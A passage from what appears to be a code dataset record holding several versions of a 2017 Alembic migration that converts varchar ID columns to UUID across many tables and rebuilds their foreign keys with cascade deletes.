'ALTER TABLE files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN jobstate_id TYPE UUID USING jobstate_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE issues ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE UUID USING previous_job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE UUID USING issue_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE teams ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN next_topic TYPE UUID USING next_topic::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.create_foreign_key('component_files_component_id_fkey',\n 'component_files', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('components_topic_id_fkey', 'components',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_job_id_fkey', 'files', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_jobstate_id_fkey', 'files', 'jobstates', [\n 'jobstate_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_team_id_fkey', 'files', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_test_id_fkey', 'files', 'tests', [\n 'test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests', 'jobdefinitions', ['jobdefinition_id'], [\n 'id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE'\n )\n op.create_foreign_key('jobdefinitions_topic_id_fkey', 'jobdefinitions',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_team_id_fkey', 'jobs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_jobdefinition_id_fkey', 'jobs',\n 'jobdefinitions', ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_remoteci_id_fkey', 'jobs', 'remotecis', [\n 'remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_previous_job_id_fkey', 'jobs', 'jobs', [\n 'previous_job_id'], ['id'])\n op.create_foreign_key('jobs_components_component_id_fkey',\n 'jobs_components', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('jobs_components_job_id_fkey', 'jobs_components',\n 'jobs', ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_issue_id_fkey', 'jobs_issues',\n 'issues', ['issue_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_job_id_fkey', 'jobs_issues', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_team_id_fkey', 'jobstates', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_job_id_fkey', 'jobstates', 'jobs', [\n 'job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_team_id_fkey', 'logs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_user_id_fkey', 'logs', 'users', ['user_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('metas_job_id_fkey', 'metas', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_test_id_fkey', 'remoteci_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_remoteci_id_fkey',\n 'remoteci_tests', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('remotecis_team_id_fkey', 'remotecis', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('tests_team_id_fkey', 'tests', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_test_id_fkey', 'topic_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_topic_id_fkey', 'topic_tests',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_next_topic_fkey', 'topics', 'topics', [\n 'next_topic'], ['id'])\n op.create_foreign_key('topics_teams_topic_id_fkey', 'topics_teams',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_teams_team_id_fkey', 'topics_teams',\n 'teams', ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_user_id_fkey', 'user_remotecis',\n 'users', ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_remoteci_id_fkey',\n 'user_remotecis', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('users_team_id_fkey', 'users', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n\n\ndef downgrade():\n pass\n", "step-4": "<mask token>\nrevision = '1bb42ff54435'\ndown_revision = '6bbbf58ed9de'\nbranch_labels = None\ndepends_on = None\nfrom alembic import op\n\n\ndef upgrade():\n op.drop_constraint('component_files_component_id_fkey', 'component_files')\n op.drop_constraint('components_topic_id_fkey', 'components')\n op.drop_constraint('files_job_id_fkey', 'files')\n op.drop_constraint('files_jobstate_id_fkey', 'files')\n op.drop_constraint('files_team_id_fkey', 'files')\n op.drop_constraint('files_test_id_fkey', 'files')\n op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions')\n op.drop_constraint('jobs_team_id_fkey', 'jobs')\n op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs')\n op.drop_constraint('jobs_remoteci_id_fkey', 'jobs')\n op.drop_constraint('jobs_previous_job_id_fkey', 'jobs')\n op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues')\n op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues')\n op.drop_constraint('jobstates_team_id_fkey', 'jobstates')\n op.drop_constraint('jobstates_job_id_fkey', 'jobstates')\n op.drop_constraint('logs_team_id_fkey', 'logs')\n op.drop_constraint('logs_user_id_fkey', 'logs')\n op.drop_constraint('metas_job_id_fkey', 'metas')\n op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests')\n op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests')\n op.drop_constraint('remotecis_team_id_fkey', 'remotecis')\n op.drop_constraint('tests_team_id_fkey', 'tests')\n op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests')\n op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests')\n op.drop_constraint('topics_next_topic_fkey', 'topics')\n op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams')\n op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams')\n op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis')\n op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis')\n op.drop_constraint('users_team_id_fkey', 'users')\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN jobstate_id TYPE UUID USING jobstate_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE issues ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE UUID USING previous_job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE UUID USING issue_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE teams ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN next_topic TYPE UUID USING next_topic::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.create_foreign_key('component_files_component_id_fkey',\n 'component_files', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('components_topic_id_fkey', 'components',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_job_id_fkey', 'files', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_jobstate_id_fkey', 'files', 'jobstates', [\n 'jobstate_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_team_id_fkey', 'files', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_test_id_fkey', 'files', 'tests', [\n 'test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests', 'jobdefinitions', ['jobdefinition_id'], [\n 'id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE'\n )\n op.create_foreign_key('jobdefinitions_topic_id_fkey', 'jobdefinitions',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_team_id_fkey', 'jobs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_jobdefinition_id_fkey', 'jobs',\n 'jobdefinitions', ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_remoteci_id_fkey', 'jobs', 'remotecis', [\n 'remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_previous_job_id_fkey', 'jobs', 'jobs', [\n 'previous_job_id'], ['id'])\n op.create_foreign_key('jobs_components_component_id_fkey',\n 'jobs_components', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('jobs_components_job_id_fkey', 'jobs_components',\n 'jobs', ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_issue_id_fkey', 'jobs_issues',\n 'issues', ['issue_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_job_id_fkey', 'jobs_issues', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_team_id_fkey', 'jobstates', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_job_id_fkey', 'jobstates', 'jobs', [\n 'job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_team_id_fkey', 'logs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_user_id_fkey', 'logs', 'users', ['user_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('metas_job_id_fkey', 'metas', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_test_id_fkey', 'remoteci_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_remoteci_id_fkey',\n 'remoteci_tests', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('remotecis_team_id_fkey', 'remotecis', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('tests_team_id_fkey', 'tests', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_test_id_fkey', 'topic_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_topic_id_fkey', 'topic_tests',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_next_topic_fkey', 'topics', 'topics', [\n 'next_topic'], ['id'])\n op.create_foreign_key('topics_teams_topic_id_fkey', 'topics_teams',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_teams_team_id_fkey', 'topics_teams',\n 'teams', ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_user_id_fkey', 'user_remotecis',\n 'users', ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_remoteci_id_fkey',\n 'user_remotecis', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('users_team_id_fkey', 'users', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n\n\ndef downgrade():\n pass\n", "step-5": "#\n# Copyright (C) 2017 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Change varchar ID to UUID\n\nRevision ID: 1bb42ff54435\nRevises: 6bbbf58ed9de\nCreate Date: 2017-02-07 09:28:37.493302\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1bb42ff54435'\ndown_revision = '6bbbf58ed9de'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\n\n\ndef upgrade():\n # Drop constraint\n op.drop_constraint('component_files_component_id_fkey', 'component_files')\n op.drop_constraint('components_topic_id_fkey', 'components')\n op.drop_constraint('files_job_id_fkey', 'files')\n op.drop_constraint('files_jobstate_id_fkey', 'files')\n op.drop_constraint('files_team_id_fkey', 'files')\n op.drop_constraint('files_test_id_fkey', 'files')\n op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions')\n op.drop_constraint('jobs_team_id_fkey', 'jobs')\n op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs')\n op.drop_constraint('jobs_remoteci_id_fkey', 'jobs')\n op.drop_constraint('jobs_previous_job_id_fkey', 'jobs')\n op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues')\n op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues')\n op.drop_constraint('jobstates_team_id_fkey', 'jobstates')\n op.drop_constraint('jobstates_job_id_fkey', 'jobstates')\n op.drop_constraint('logs_team_id_fkey', 'logs')\n op.drop_constraint('logs_user_id_fkey', 'logs')\n op.drop_constraint('metas_job_id_fkey', 'metas')\n op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests')\n op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests')\n op.drop_constraint('remotecis_team_id_fkey', 'remotecis')\n op.drop_constraint('tests_team_id_fkey', 'tests')\n op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests')\n op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests')\n op.drop_constraint('topics_next_topic_fkey', 'topics')\n op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams')\n op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams')\n op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis')\n op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis')\n op.drop_constraint('users_team_id_fkey', 'users')\n\n # Change type\n # Table component_files\n op.execute(\"ALTER TABLE component_files ALTER COLUMN component_id TYPE \\\n UUID USING component_id::uuid\")\n op.execute(\"ALTER TABLE component_files ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n\n # Table components\n op.execute(\"ALTER TABLE components ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE components ALTER COLUMN topic_id TYPE \\\n UUID USING topic_id::uuid\")\n\n # Table files\n op.execute(\"ALTER TABLE files ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE files ALTER COLUMN jobstate_id TYPE \\\n UUID USING jobstate_id::uuid\")\n op.execute(\"ALTER TABLE files ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n op.execute(\"ALTER TABLE files ALTER COLUMN job_id TYPE \\\n UUID USING job_id::uuid\")\n op.execute(\"ALTER TABLE files ALTER COLUMN test_id TYPE \\\n UUID USING test_id::uuid\")\n\n # Table issues\n op.execute(\"ALTER TABLE issues ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n\n # Table jobdefinition_tests\n op.execute(\"ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id \\\n TYPE UUID USING jobdefinition_id::uuid\")\n op.execute(\"ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE \\\n UUID USING test_id::uuid\")\n\n # Table jobdefinitions\n op.execute(\"ALTER TABLE jobdefinitions ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE \\\n UUID USING topic_id::uuid\")\n\n # Table jobs\n op.execute(\"ALTER TABLE jobs ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE \\\n UUID USING jobdefinition_id::uuid\")\n op.execute(\"ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE \\\n UUID USING remoteci_id::uuid\")\n op.execute(\"ALTER TABLE jobs ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n op.execute(\"ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE \\\n UUID USING previous_job_id::uuid\")\n\n # Table jobs_components\n op.execute(\"ALTER TABLE jobs_components ALTER COLUMN component_id TYPE \\\n UUID USING component_id::uuid\")\n op.execute(\"ALTER TABLE jobs_components ALTER COLUMN job_id TYPE \\\n UUID USING job_id::uuid\")\n\n # Table jobs_issues\n op.execute(\"ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE \\\n UUID USING job_id::uuid\")\n op.execute(\"ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE \\\n UUID USING issue_id::uuid\")\n\n # Table jobstates\n op.execute(\"ALTER TABLE jobstates ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE jobstates ALTER COLUMN job_id TYPE \\\n UUID USING job_id::uuid\")\n op.execute(\"ALTER TABLE jobstates ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Table logs\n op.execute(\"ALTER TABLE logs ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE logs ALTER COLUMN user_id TYPE \\\n UUID USING user_id::uuid\")\n op.execute(\"ALTER TABLE logs ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Table metas\n op.execute(\"ALTER TABLE metas ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE metas ALTER COLUMN job_id TYPE \\\n UUID USING job_id::uuid\")\n\n # Table remoteci_tests\n op.execute(\"ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE \\\n UUID USING remoteci_id::uuid\")\n op.execute(\"ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE \\\n UUID USING test_id::uuid\")\n\n # Table remotecis\n op.execute(\"ALTER TABLE remotecis ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE remotecis ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Table teams\n op.execute(\"ALTER TABLE teams ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n\n # Table tests\n op.execute(\"ALTER TABLE tests ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE tests ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Table topic_tests\n op.execute(\"ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE \\\n UUID USING topic_id::uuid\")\n op.execute(\"ALTER TABLE topic_tests ALTER COLUMN test_id TYPE \\\n UUID USING test_id::uuid\")\n\n # Table topics\n op.execute(\"ALTER TABLE topics ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n op.execute(\"ALTER TABLE topics ALTER COLUMN next_topic TYPE \\\n UUID USING next_topic::uuid\")\n\n # Table topics_teams\n op.execute(\"ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE \\\n UUID USING topic_id::uuid\")\n op.execute(\"ALTER TABLE topics_teams ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Table user_remotecis\n op.execute(\"ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE \\\n UUID USING user_id::uuid\")\n op.execute(\"ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE \\\n UUID USING remoteci_id::uuid\")\n\n # Table users\n op.execute(\"ALTER TABLE users ALTER COLUMN id TYPE \\\n UUID USING id::uuid\")\n 